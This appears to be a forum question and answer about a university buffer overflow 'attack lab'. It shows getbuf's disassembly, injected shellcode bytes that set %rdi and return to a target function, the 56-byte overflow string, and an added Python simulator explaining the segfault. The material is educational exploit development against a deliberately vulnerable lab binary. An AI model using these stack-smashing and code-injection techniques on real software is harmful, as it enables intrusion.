
I have a buffer overflow lab for homework in cs (also known as attack lab). In this phase, I have to overflow a char array, insert my own code in order to alter a register, and redirect to a "hidden function".

This is the main code executed every time:

000000000040187a <getbuf>:  
40187a: 48 83 ec 38             sub    $0x38,%rsp  
40187e: 48 89 e7                mov    %rsp,%rdi  
401881: e8 8a 02 00 00          callq  401b10 <Gets>  
401886: b8 01 00 00 00          mov    $0x1,%eax  
40188b: 48 83 c4 38             add    $0x38,%rsp  
40188f: c3                      retq   

Where Gets simply gets the user input and stores it on the stack. I've been able to pass an address to a separate function (that was the first part) by using 56 characters to fill the array and then overwriting the retq with an address to a function.

However, the second part gets trickier. Not only do I need to end up at the address of a function, but I also need to change a register (in this case, %rdi).

My most successful (but still unsuccessful) attempt has been to write the assembly code as follows:

pushq $0x2486651c      # 68 1c 65 86 24: push the value wanted in %rdi
popq %rdi              # 5f: pop it into %rdi
pushq $0x004018bc      # 68 bc 18 40 00: push the address to go to
popq %rsp              # 5c: pop it into %rsp
retq                   # c3

Where 0x2486651c is the value I want to be stored in %rdi, and 0x004018bc is the address that I want to then go to (and execute). I used gcc to turn this into a .o file, then objdump-ed it, and used the resulting byte commands as the beginning of my 56 char input. My input then becomes:

68 1c 65 86 24 5f 68 bc 18 40 00 5c c3 ... 38 12 63 55

Where 38 12 63 55 is the little-endian address of the beginning of the character array, and the bytes before the ... are the byte instructions for the aforementioned assembly code.

Now, when running this, it will step into my assembly code above (using gdb and disas to view it). However, it results in a seg fault when trying to execute the retq.

So my task boils down to:
1. Pass some 56 char + an address input into the function
2. Have the end (+ address) lead to my own code
3. Have my own code change the value in %rdi
4. Then have my own code lead to a specified address of some other function that is already written.

Thank you in advance, and let me know if any of this is confusing and I'll do my best to elaborate.

You don't need the popq %rsp, what do you think that does? You want the retq to pop off the address you pushed. – Jester Oct 19 at 12:24
That's the part I was confused on. Through some googling I thought that retq would go to whatever %rsp held. Thank you. – Eric Oct 19 at 16:35
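To make the point in the comment above concrete, here is an added example (not code from the question or the lab) that models push/pop/retq over a toy stack: the posted sequence moves %rsp into the code section, so retq pops its target from there, while the same sequence without the popq %rsp leaves the pushed address on the stack for retq to consume. The mapped stack range, the initial %rsp (derived from the buffer address and the 0x38-byte frame in the post) and the single valid code target are constructed assumptions.

```python
STACK_LO, STACK_HI = 0x55631000, 0x55631400   # constructed: the only mapped data region
CODE_TARGETS = {0x4018bc}                      # constructed: the only valid jump target
INITIAL_RSP = 0x55631238 + 0x38 + 8   # buffer start (post) + getbuf frame + popped return address

class SegFault(Exception):
    pass

class Cpu:
    def __init__(self, rsp):
        self.rsp, self.rdi, self.mem = rsp, 0, {}   # memory is 8-byte slots keyed by address

    def _check(self, addr):
        if not STACK_LO <= addr < STACK_HI:
            raise SegFault(f"bad stack access at {addr:#x}")

    def push(self, value):
        self.rsp -= 8                              # the stack grows down
        self._check(self.rsp)
        self.mem[self.rsp] = value & 0xFFFFFFFFFFFFFFFF

    def pop(self):
        self._check(self.rsp)
        value = self.mem.get(self.rsp, 0)
        self.rsp += 8
        return value

    def run(self, program):
        """Run (mnemonic, operand) pairs; return the address the retq transfers to."""
        for op, arg in program:
            if op == "push":
                self.push(arg)
            elif op == "pop":
                setattr(self, arg, self.pop())     # pop into %rdi or %rsp by name
            elif op == "ret":
                target = self.pop()                # retq is "pop %rip"
                if target not in CODE_TARGETS:
                    raise SegFault(f"ret to non-code address {target:#x}")
                return target
        raise RuntimeError("program ended without ret")

# The posted sequence, and the same sequence with the popq %rsp dropped.
POSTED = [("push", 0x2486651c), ("pop", "rdi"), ("push", 0x4018bc), ("pop", "rsp"), ("ret", None)]
FIXED = [("push", 0x2486651c), ("pop", "rdi"), ("push", 0x4018bc), ("ret", None)]

def simulate(program, rsp=INITIAL_RSP):
    """Return (outcome, rdi): outcome is the jump target or the fault message."""
    cpu = Cpu(rsp)
    try:
        return cpu.run(program), cpu.rdi
    except SegFault as exc:
        return str(exc), cpu.rdi
```

The model maps only the stack as data, so the fault shows up at the pop inside retq; a real CPU would read the instruction bytes at 0x4018bc as the return address and fault when jumping to whatever they decode to.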
